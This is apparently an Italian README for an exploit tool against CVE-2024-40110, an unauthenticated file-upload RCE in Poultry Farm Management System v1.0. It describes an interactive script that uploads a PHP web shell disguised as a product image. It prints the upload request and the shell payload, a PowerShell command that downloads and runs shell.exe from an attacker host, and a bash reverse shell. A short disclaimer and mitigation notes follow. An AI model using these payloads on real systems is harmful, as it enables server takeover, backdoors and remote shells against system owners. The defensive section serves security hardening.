
Exploit per CVE-2024-40110, un upload di file non autenticato RCE in Poultry Farm Management System v1.0. Carica una shell PHP per eseguire comandi arbitrari sul target.
Caricamento file non autenticato con esecuzione remota di codice
Il Sistema di Gestione Allevamento Avicolo v1.0 contiene una vulnerabilità critica nella funzionalità di caricamento dei prodotti. L'applicazione non convalida e non sanifica adeguatamente i caricamenti di file, consentendo agli attaccanti di caricare file PHP camuffati da immagini di prodotto. Questi file PHP caricati possono essere eseguiti per ottenere l'esecuzione remota di codice.
POST /paultry/farm/product.php o POST /farm/product.php
La vulnerabilità può essere sfruttata attraverso:
requestscolorama (per output colorato)pip install requests colorama
Oppure installa tutte le dipendenze:
pip install -r requirements.txt
Esegui lo script in modo interattivo:
python exploit.py
Lo script ti chiederà:
==================================================
Strumento Interattivo per il Caricamento di Backdoor
==================================================
Inserisci l'indirizzo IP del target: 192.168.1.100
Inserisci la porta del target (default: 80): 8080
Inserisci il comando da eseguire (default: payload powershell):
Comando: whoami
==================================================
CONFERMA
==================================================
URL target: http://192.168.1.100:8080
Comando: whoami
Vuoi procedere? (sì/no): sì
✅ Input Interattivo - Richiede IP, porta e comandi personalizzati
✅ Valori Predefiniti - Default sensati per comodità
✅ Output Colorato - Output terminale colorato facile da leggere
✅ Passaggio di Conferma - Verifica le impostazioni prima dell'esecuzione
✅ Gestione Errori - Messaggi di errore chiari per richieste fallite
✅ Comandi Flessibili - Supporto per qualsiasi comando shell o payload PowerShell
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"
bash -i >& /dev/tcp/attacker-ip/4444 0>&1
whoami
id
ifconfig
hostname
pwd
/assets/img/productimages/system()POST /paultry/farm/product.php
Content-Type: multipart/form-data
category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]
<?php system('COMANDO_QUI');?>
L'exploit è stato testato su:
⚠️ AVVISO LEGALE
Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale.
Aggiornamento Software - Applicare patch di sicurezza se disponibili
Validazione dei Caricamenti File
Configurazione
<Directory /uploads>
php_flag engine off
AddType text/plain .php .phtml .php3 .php4 .php5 .phar
</Directory>
Controllo Accessi
Monitoraggio
Errore: Connessione rifiutata
Soluzione: Verificare che l'indirizzo IP e la porta del target siano corretti e che l'applicazione sia in esecuzione
Errore: Caricamento shell fallito. Codice di stato: 404
Soluzione: Il percorso dell'endpoint potrebbe differire. Percorsi comuni: /farm/, /paultry/farm/
Errore: Output del comando vuoto
Soluzione: L'esecuzione PHP potrebbe essere disabilitata o il file non è stato caricato correttamente
Per problemi, domande o miglioramenti, fare riferimento al repository GitHub o alla pagina Exploit-DB.
Ultimo aggiornamento: Dicembre 2024
Stato: Verificato e testato